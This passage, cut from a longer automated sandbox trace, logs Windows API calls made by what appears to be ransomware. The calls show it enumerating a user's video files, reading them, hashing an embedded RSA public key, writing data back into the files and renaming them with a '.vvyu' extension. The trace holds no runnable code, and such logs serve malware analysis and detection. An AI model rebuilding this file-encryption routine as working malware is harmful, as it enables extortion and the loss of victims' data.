Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39838 [0187.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397d8 [0187.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0187.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397f0 [0187.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397c0 [0187.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39850 [0187.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0187.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39820 [0187.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0187.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39808 [0187.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39868 [0187.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0187.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39808 [0187.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39820 | out: hHeap=0x6a0000) returned 1 [0187.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0187.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d397d8 [0187.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39838 | out: hHeap=0x6a0000) returned 1 [0187.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39868 | out: hHeap=0x6a0000) returned 1 [0187.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0187.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397d8 | out: hHeap=0x6a0000) returned 1 [0187.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0187.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.911] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0187.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0187.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0187.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397c0 | out: hHeap=0x6a0000) returned 1 [0187.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0187.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0187.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0187.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397a8 | out: hHeap=0x6a0000) returned 1 [0187.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38e20 | out: hHeap=0x6a0000) returned 1 [0187.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.915] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x7cab, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x7cab, lpOverlapped=0x0) returned 1 [0187.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0187.916] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x7cb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.916] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.918] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.918] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.918] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.918] CloseHandle (hObject=0x584) returned 1 [0187.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0187.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0187.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0187.920] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\HDnGwo1W3X7Qq9.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\hdngwo1w3x7qq9.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\HDnGwo1W3X7Qq9.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\hdngwo1w3x7qq9.flv.vvyu")) returned 1 [0187.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.923] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.926] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb72eb6b0, ftCreationTime.dwHighDateTime=0x1d8a105, ftLastAccessTime.dwLowDateTime=0x1bbd4940, ftLastAccessTime.dwHighDateTime=0x1d8a492, ftLastWriteTime.dwLowDateTime=0x1bbd4940, ftLastWriteTime.dwHighDateTime=0x1d8a492, nFileSizeHigh=0x0, nFileSizeLow=0x41a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U7uNQ0 Vl v.flv", cAlternateFileName="U7UNQ0~1.FLV")) returned 1 [0187.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38e20 [0187.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0187.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38e20 | out: hHeap=0x6a0000) returned 1 [0187.927] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\U7uNQ0 Vl v.flv") returned=".flv" [0187.927] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\U7uNQ0 Vl v.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\u7unq0 vl v.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.927] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=16802) returned 1 [0187.927] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.930] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x417c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.930] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.932] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.933] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.933] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.933] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x41a2, lpOverlapped=0x0) returned 1 [0187.934] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.934] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.934] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.934] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.935] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.935] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.935] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.935] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.935] GetLastError () returned 0x0 [0187.935] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.935] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.936] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.936] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.936] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x41a0) returned 0x2d43778 [0187.936] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38e20 [0187.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397a8 [0187.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38e68 [0187.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397c0 [0187.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d397f0 [0187.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39850 [0187.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39808 [0187.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0187.937] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0187.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d397f0 | out: hHeap=0x6a0000) returned 1 [0187.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0187.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39850 | out: hHeap=0x6a0000) returned 1 [0187.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39850 [0187.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0187.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39808 [0187.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0187.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d397f0 [0187.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0187.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0187.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39808 | out: hHeap=0x6a0000) returned 1 [0187.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 